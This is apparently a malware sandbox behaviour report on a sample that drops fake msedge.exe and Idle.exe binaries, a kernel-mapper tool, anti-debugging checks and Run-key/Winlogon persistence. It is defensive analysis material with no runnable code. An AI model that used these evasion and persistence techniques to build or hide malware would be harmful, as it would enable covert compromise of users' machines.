                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"Jump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\__tmp_rar_sfx_access_check_6779343Jump to behavior
                                Source: kdmapper.exe.10.drStatic PE information: section name: .didat
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFF640 push ecx; ret 12_2_00DFF653
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFEB78 push eax; ret 12_2_00DFEB96
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00440905 push ecx; retf 19_2_00440906
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00452DD9 push eax; retf 19_2_004534E2
                                Source: C:\Edge\msedge.exeCode function: 23_2_00007FFAAB794B92 pushad ; retf 23_2_00007FFAAB794B95
                                Source: C:\Edge\msedge.exeCode function: 23_2_00007FFAABB88B28 push eax; ret 23_2_00007FFAABB88B29
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFAAB69D2A5 pushad ; iretd 36_2_00007FFAAB69D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFAAB888DB0 pushad ; ret 36_2_00007FFAAB888DB1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFAAB882316 push 8B485F91h; iretd 36_2_00007FFAAB88231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFAAB66D2A5 pushad ; iretd 37_2_00007FFAAB66D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFAAB852316 push 8B485F94h; iretd 37_2_00007FFAAB85231B
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 40_2_00007FFAAB784B92 pushad ; retf 40_2_00007FFAAB784B95
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB794B92 pushad ; retf 41_2_00007FFAAB794B95
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7A8AC3 push ss; iretd 41_2_00007FFAAB7A8AC9
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7A967D push edi; ret 41_2_00007FFAAB7A9688
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 41_2_00007FFAAB7C7A05 push eax; iretd 41_2_00007FFAAB7C7A4D
                                Source: C:\Edge\msedge.exeCode function: 42_2_00007FFAAB7A4B92 pushad ; retf 42_2_00007FFAAB7A4B95
                                Source: C:\Edge\msedge.exeCode function: 42_2_00007FFAABB98B28 push eax; ret 42_2_00007FFAABB98B29
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7A8AC3 push ss; iretd 43_2_00007FFAAB7A8AC9
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7A967D push edi; ret 43_2_00007FFAAB7A9688
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB794B92 pushad ; retf 43_2_00007FFAAB794B95
                                Source: C:\Edge\msedge.exeCode function: 43_2_00007FFAAB7C7A05 push eax; iretd 43_2_00007FFAAB7C7A4D
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAAB774B92 pushad ; retf 49_2_00007FFAAB774B95
                                Source: C:\Edge\msedge.exeCode function: 49_2_00007FFAABB68B28 push eax; ret 49_2_00007FFAABB68B29
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7A8AC3 push ss; iretd 54_2_00007FFAAB7A8AC9
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7A967D push edi; ret 54_2_00007FFAAB7A9688
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB7C7A05 push eax; iretd 54_2_00007FFAAB7C7A4D
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAAB794B92 pushad ; retf 54_2_00007FFAAB794B95
                                Source: C:\Users\user\AppData\Local\Idle.exeCode function: 54_2_00007FFAABB88B28 push eax; ret 54_2_00007FFAABB88B29
                                Source: msedge.exe.12.drStatic PE information: section name: .text entropy: 7.556050087022216
                                Source: physmeme.exe.14.drStatic PE information: section name: .text entropy: 7.9965850430662675
                                Source: Idle.exe.23.drStatic PE information: section name: .text entropy: 7.556050087022216

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeExecutable created and started: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeExecutable created and started: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\NDQNJGxB.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\AwpzIjFt.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\LUAEjdyP.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\dgcKDzTe.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\NohnZlpE.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\tGwZoaKl.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\pGvBroyE.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\sharmiXk.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\YlsMudWZ.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\Idle.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\CQuHWLcS.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\onyQOgMn.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\aUzlTMCV.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\MsCvKimq.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\YtKLaCEq.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\iZOTduyR.logJump to dropped file
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\msedge.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\LAdenXtG.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\WjFdZuSe.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\BlhoAAti.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\iyHbCGSC.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\PDYwKARr.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\WjFdZuSe.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\onyQOgMn.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\YlsMudWZ.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\PDYwKARr.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\MsCvKimq.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\tGwZoaKl.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\CQuHWLcS.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\sharmiXk.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\iyHbCGSC.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\aUzlTMCV.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\AwpzIjFt.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\YtKLaCEq.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\dgcKDzTe.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\LUAEjdyP.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\BlhoAAti.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\NohnZlpE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\pGvBroyE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\LAdenXtG.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\iZOTduyR.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeFile created: C:\Users\user\Desktop\NDQNJGxB.logJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
